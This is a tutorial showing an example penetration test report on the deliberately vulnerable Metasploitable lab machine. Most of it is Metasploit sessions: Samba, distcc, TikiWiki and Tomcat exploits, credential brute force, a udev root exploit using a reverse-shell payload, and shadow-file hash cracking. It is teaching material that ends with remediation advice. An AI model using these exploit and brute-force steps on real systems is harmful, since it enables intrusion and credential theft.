HowTo: Penetration test report example [Metasploitable]

Finding a vulnerability is not easy, we know, but it’s useless for System Administrators, CTOs, CISOs or Web Apps Developers  without a penetration test report.

In this tutorial we’ll try to explain how to complete a penetration testing report. It is generally accepted that the pentest report needs to have a couple of sections: the executive summary and the technical report. For now, we don’t enforce any standard for completing the penetration testing report.

If you already use an existing standard or you have your own style of producing an useful report, you may use that. Otherwise, we recommend you to follow the Penetration Testing Execution Standard guidelines. These guidelines are easy to follow. They are also well structured. However, not all the sections apply to this platform due to the way Hack a Server works. The whole description of the report structure fits onto a single wiki page. We think that this is way much easier to follow than a 200 pages book like other standards provide.

For the purpose of this tutorial, we used the “Metasploitable” instance which served as target. It is available on our platform but you may also download its image from the Internet. You may reproduce the findings yourself if you want to.

Since the client is anonymous, for the purpose of this tutorial is referred as “the client”. The platform uses randomly associated IP addresses to the machines in the playground arena, therefore the machine itself is usually referred by using its hostname. The IP address of the target machine was 10.0.0.3, but this serves just as example for this tutorial.

Please note that this tutorial may not contain all the vulnerabilities of the instance. We appreciate the feedback. Also, Metasploitable itself was designed as a highly vulnerable target, therefore don’t expect that in most real life scenarios.

The example pentest report:

The Executive Summary

Background

The client tasked with performing an internal/external vulnerability assessment and penetration testing of the Metasploitable machine. This system have been identified as extreme risk of security controls being compromised. The purpose of this assessment was to verify the effectiveness of the security controls put in place by the client to secure business-critical information.

Overall Posture

The system lacks effective patch management of the vulnerable services. The system also lacks strong authentication credentials which puts most of the running services at risk.

Risk Ranking/Profile

The “Overall Risk Score” for the Metasploitable machine is currently a Fifteen (15). This rating implies an EXTREME risk of security controls being compromised with the potential for catastrophic financial losses. The pentester determined this risk score based on four (4) extreme risk vulnerabilities, along with success of attack of these vulnerabilities. The most severe vulnerability was superuser access, attainable by using four different methods. This vulnerability is a full system compromise. Several lesser severe vulnerabilities could lead to theft of valid account credentials and leakage of information.

General Findings

There were identified:

- 7 vulnerabilities due to easily guessable credentials
- 4 vulnerabilities due to missing patches
- 3 vulnerability due to lack of OS hardening

Recommendation Summary

The system services should be updated to the latest versions which contain patches for the found vulnerabilities. The weak credentials should be replaced by strong credentials. These procedures have top priority.

The Technical Report

Information Gathering

The information about the running services was gathered by using nmap against the address of the Metasploitable machine. Some service specific information were gathered by using the auxiliary modules of the Metasploit Framework.

Vulnerability Assessment

The nmap scanner identified most of the services which were listening on the network:

21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

The smb_version scanner of the Metasploit framework identified the specific version of the running Samba server: Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP). This Samba version presumably contains the CVE-2007-2447 vulnerability which could be used by an attacker to gain remote superuser access.

Exploitation/Vulnerability Confirmation

By using the Metasploi Framework provided exploit for CVE-2007-2447 of the running Samba service, the exploit/multi/samba/usermap_script module, it was obtained a remote superuser shell.

msf auxiliary(smb_version) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mdf6b1a2vlpL5byf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "mdf6b1a2vlpL5byf\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.3:60740) at 2012-04-11 17:11:02 -0400
id
uid=0(root) gid=0(root)
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 08:00:27:dc:ca:70
inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fedc:ca70/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:704 errors:0 dropped:0 overruns:0 frame:0
TX packets:1178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:65873 (64.3 KB) TX bytes:81962 (80.0 KB)
Base address:0xd010 Memory:f0000000-f0020000

The running SSH service can be easily attacked by a basic bruteforce by using the unix_users.txt list of Wfuzz.


msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.3
msf auxiliary(ssh_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(ssh_login) > run
[*] 10.0.0.3:22 SSH - Starting bruteforce
[*] Command shell session 1 opened (10.0.0.2:38601 -> 10.0.0.3:22) at 2012-04-14 14:37:58 -0400
[+] 10.0.0.3:22 SSH - [174/216] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.0.2:34166 -> 10.0.0.3:22) at 2012-04-14 14:38:18 -0400
[+] 10.0.0.3:22 SSH - [184/216] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.2:43396 -> 10.0.0.3:22) at 2012-04-14 14:39:06 -0400
[+] 10.0.0.3:22 SSH - [207/216] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell SSH postgres:postgres (10.0.0.3:22) 10.0.0.2:38601 -> 10.0.0.3:22
2 shell SSH service:service (10.0.0.3:22) 10.0.0.2:34166 -> 10.0.0.3:22
3 shell SSH user:user (10.0.0.3:22) 10.0.0.2:43396 -> 10.0.0.3:22

By inspecting the sessions, the “user” account contained the information to gain access to another system account: msfadmin. The shell history of the user account contains this:


sudo cat ~/.ssh/id_dsa.pub >> /home/msfadmin/.ssh/authorized_keys

Therefore a login to msfadmin proved to be possible by using:


ssh msfadmin@localhost

Inspecting the msfadmin shell history, this information was found:


sudo mkdir /root/.ssh; sudo cat .ssh/id_rsa.pub >> /root/.ssh/authorized_keys
sudo cat .ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Gaining root access via SSH by using the private key stored into the msfadmin account proved to be possible.


ssh root@localhost
id
uid=0(root) gid=0(root)

From the SSH user shell obtained previously, the udev version could be identified:


udevinfo --version
117

This version is known to contain the CVE-2009-1185 vulnerability. By exploiting this vulnerability, an attacker could gain local root privileges. In order to exploit this remotely, some intermediate steps were required.

1. Compiling a reverse shell payload as single binary.


msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.4 LPORT=4444 X > run
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.4", "LPORT"=>"4444"}

The LHOST and LPORT parameters indicate the attacker’s machine.

2. Upload the compiled binary to /tmp/run and make it executable.


scp run user@10.0.0.3:/tmp/run
user@10.0.0.3's password:
run
ssh user@10.0.0.3
chmod +x /tmp/run

The reason for placing the executable in /tmp/run is the fact that that’s the path this exploit uses.

3. Start a listener for the reverse shell.


msf > use multi/handler
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...

4. Get the exploit source and compile it to the target machine. Then, run the exploit.

The exploit source code is available here: http://www.exploit-db.com/exploits/8572/. Fortunately, the Metasploitable machine has a working gcc compiler, therefore the exploit binary can be build on the target machine.


gcc udev.c -o udev

The resulted ‘udev’ binary requires a single argument: the PID of the udevd netlink socket. This process PID is usually the PID of the udevd process minus one:


ps -A | grep udevd
./udev [above returned PID - 1]

The listener started on the Metasploit Framework console should receive a new session if everything is done properly:


[*] Command shell session 1 opened (10.0.0.4:4444 -> 10.0.0.3:48112) at 2012-04-16 06:04:41 +0300
session
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell linux 10.0.0.4:4444 -> 10.0.0.3:48112 (10.0.0.3)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)

By using any of the above root shells, one can easily retrieve the passwd and the shadow files:


# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false


# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::

With the unshadow utility of John the Ripper, these files can be converted to a format that JtR can bruteforce:


/pentest/passwords/john/unshadow passwd shadow > unshadow
/pentest/passwords/john/john unshadow
Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [32/32])
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
123456789 (klog)
batman (sys)

There were recovered six system accounts with their passwords, in the format: password (username) from the above list.

Since the msfadmin user also has a weak password, msfadmin, there’s another method for gaining root access as this user proved to have sudo access:


sudo -s
[sudo] password for msfadmin:
uid=0(root) gid=0(root) groups=0(root)

The msfadmin password is weak, therefore this credential may be obtain by different means than already having root access and brute forcing the shadowed passwords.

The running MySQL database server is vulnerable to easily guessable credentials as well:


msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(mysql_login) > set THREADS 5
THREADS => 5
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(mysql_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(mysql_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
USER_FILE => /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(mysql_login) > run
[+] 10.0.0.3:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

By using the root user of the MySQL database, all the stored information into the database itself is accessible to an attacker. It may be used as an alternative for getting the system users list:


mysql -h 10.0.0.3 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> SELECT LOAD_FILE('/etc/passwd')\g
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false

The running PostgreSQL database server is vulnerable to easily guessable credentials as well:


msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/framework/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target address range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME postgres no A specific username to authenticate as
USERPASS_FILE /opt/framework/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/framework/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(postgres_login) > set THREADS 5
THREADS => 5
msf auxiliary(postgres_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(postgres_login) > set USER_FILE /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
USER_FILE => /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/unix-os/unix_users.txt
msf auxiliary(postgres_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(postgres_login) > run
[+] 10.0.0.3:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The database server contains a couple of databases: template0 and template1, but no useful information was found in them.

Due to the fact that the document root of the running Apache2 server is world readable, the following information could be retrieved:


-rw-r--r-- 1 root root 19 2010-04-16 02:12 phpinfo.php
drwxrwxr-x 22 msfadmin msfadmin 20480 2010-04-19 18:54 tikiwiki
drwxrwxr-x 22 msfadmin msfadmin 20480 2010-04-16 02:17 tikiwiki-old
drwxr-xr-x 7 msfadmin msfadmin 4096 2010-04-16 15:27 twiki

The phpinfo.php script runs the phpinfo() function of the PHP language, dumping into the web page all the runtime information of your environment. In certain situations, this could be valuable information to the attackers.

The rest of the directories contain some web applications. The application from /var/www/tikiwiki/ proved to be a vulnerable Tikiwiki installation.


msf exploit(twiki_search) > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > show options
Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tikiwiki_graph_formula_exec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(tikiwiki_graph_formula_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager IPv6
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started bind handler
[*] Attempting to obtain database credentials...
[*] No response from the server
[*] Attempting to execute our payload...
[*] Sending stage (38791 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.4:36968 -> 10.0.0.3:4444) at 2012-04-16 04:44:12 +0300
meterpreter > shell
Process 5799 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Since the tikiwiki installation directories are world readable, the MySQL database credentials could be retrieved.

From a local shell, a listening service that didn’t get picked up by nmap could be spotted:


user@metasploitable:~$ netstat -atln
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.4:53 0.0.0.0:* LISTEN
tcp 0 0 10.0.0.3:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
tcp6 0 0 :::3632 :::* LISTEN
tcp6 0 0 :::21 :::* LISTEN
tcp6 0 0 :::53 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::5432 :::* LISTEN
tcp6 0 0 ::1:953 :::* LISTEN
tcp6 0 132 192.168.1.4:22 192.168.1.100:8951 ESTABLISHED
user@metasploitable:~$ netstat -atln | grep 3632
tcp6 0 0 :::3632 :::* LISTEN
user@metasploitable:~$ ps -A | grep distcc
4528 ? 00:00:00 distccd
4529 ? 00:00:00 distccd
4651 ? 00:00:00 distccd
4689 ? 00:00:00 distccd

This listening port is usually in use by distcc, which is a ditributed compiler. It was proved that the daemon behind the 3632 port was indeed distcc. The distcc version information:


distcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=c,c++,fortran,objc,obj-c++,treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)

This version proved to be vulnerable to CVE-2004-2687:


msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xAyLCX15XTfF2u7t;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xAyLCX15XTfF2u7t\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (10.0.0.4:4444 -> 10.0.0.3:41755) at 2012-04-16 04:50:11 +0300
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

The running tomcat daemon proved to have weak credentials for the deploy manager:


msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/framework/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login) > set RHOSTS 10.0.0.3
RHOSTS => 10.0.0.3
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(tomcat_mgr_login) > set THREADS 5
THREADS => 5
msf auxiliary(tomcat_mgr_login) > run
[+] http://10.0.0.3:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then, the tomcat deploy manager can be used to gain another shell:


msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 10.0.0.2:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6215 bytes as MRgShe.war ...
[*] Executing /MRgShe/DhASJ.jsp...
[*] Undeploying MRgShe ...
[*] Sending stage (28597 bytes) to 10.0.0.3
[*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:60788) at 2012-04-14 16:10:44 -0400
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

The target machine also has a working gcc compiler. While this is not a vulnerability by itself, it eases the task for running exploits on the target. It could enable the attacker the possibility to compile exploits on the target machines without any means of file transfer.

Post Exploitation

In order to avoid the presented methods for gaining the root access, the following measures should be taken:

- patch the Samba daemon.
- patch the udev daemon.
- don’t keep the private key that can access the root account onto the same machine. You may disable root login via SSH as well in order to mitigate any SSH attack for the root user.
- don’t provide sudo access to a user with weak credentials. If possible, completely avoid the sudo usage as it increases the attack surface.

Although the root password itself was not recovered in a timely manner, its hash value was recovered from the /etc/shadow file. In order to avoid potential issues, it is recommended to change the existing root password with a strong password.

In order to avoid gaining remote shells to unprivileged users, these services must be patched:

- the distcc daemon
- the tikiwiki installation available in /var/www/tikiwiki. The /var/www/tikiwiki-old installation proved to be patched.

